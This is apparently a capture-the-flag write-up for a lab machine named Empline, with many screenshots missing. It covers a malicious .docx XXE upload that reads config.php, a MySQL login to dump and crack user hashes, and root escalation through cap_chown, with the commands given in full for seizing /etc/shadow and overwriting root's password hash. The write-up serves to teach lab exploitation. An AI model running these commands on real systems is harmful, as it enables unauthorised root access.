Nmap Output:

 

 

Home Page

 

 

While browsing the home page, we see a subdomain when we look at the URL that the employment tab directs us to.

 

 

Edit /etc/hosts

 

 

job.empline.thm

 

 

Let's explore a bit:

 

 

The creation of a malicious document will allow us to be able to read a file on the server.

 

Creation of the script to generate a ‘.docx’ file:

 

 

 

After running the script:

 

 

We edit it as above.

 

Now we just need to re-zip it all and upload it to the site!

 

 

after uploading

 

 

we only got username.

 

However this does not allow us to move forward in the exploitation of this machine, what may be interesting is to read the content of the config.php file containing the connection information to the database which is opened upon connection on port 3306

 

The second line we will write this time is as follows.

 

"]>"

 

 

Let's decode it with base64.

 

 

log in with database information.

 

 

mysql -h 10.10.170.127 -u james -p opencats

select * from user;

Let's go down a little bit:

 

 

md5crackstation

 

 

We can log in with our password.

 

 

We got our first flag.

 

Time to privilege escalation...

 

 

cap_chown activated, the latter allows you to change the owner of a file/folder.

 

 

result:

 

 

 

Let me explain the codes as follows.

  

Change the owner of /etc/shadow

george@empline# ruby -e "File.chown(1002, 1002, '/etc/shadow')"

Set 777 perms to this file

 

george@empline# chmod 777 /etc/shadow

Create a new password for root user where ufkdup = password

 

george@empline# openssl passwd ufkdup

we got ItrWeBp6tLgsA

 

Let's modify the root user in /etc/shadow

 

root:$6$1cvOcl49$/czKHKvBaz450J3YnIvkqexT.StvdgUWzPr5X1Aitt/kxgF/i78wziX3zJQ0y8Kg9y749Qjr5EFiHmTdPsIJH/:

to

 

root:ItrWeBp6tLgsA:

switch to root